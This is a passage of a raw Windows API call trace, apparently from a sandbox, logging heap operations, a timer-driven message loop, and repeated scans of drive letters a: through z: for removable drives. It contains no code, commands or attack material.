| out: hHeap=0x12c0000) returned 1 [0216.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0216.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.823] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.823] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.823] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.823] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0216.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0216.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0216.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.825] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.825] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0216.825] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0216.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.826] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.826] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.827] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.827] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.827] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.827] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.827] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.828] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.828] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.828] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.829] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.829] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.829] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.829] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.829] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.830] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.830] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.830] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.830] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.830] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.831] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.831] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.831] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.831] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.831] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.831] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.832] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0216.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.838] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.838] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.838] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.838] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.838] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.838] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0216.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0216.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0216.839] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0216.839] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.839] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0216.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.840] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0216.840] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0216.840] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.840] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.840] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.841] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.841] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.841] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.841] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.841] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.842] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.842] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.842] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.842] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.842] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.842] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.843] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.844] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.844] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.844] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.844] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.845] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.845] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.845] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.845] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.846] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.846] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.846] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.846] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.847] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0216.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.848] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0216.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0216.849] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.849] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.849] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.849] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.849] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.849] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0216.849] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0216.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.850] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.850] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.850] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.850] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.851] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.851] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.851] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.851] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.851] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.852] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.852] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.852] GetDriveTypeW 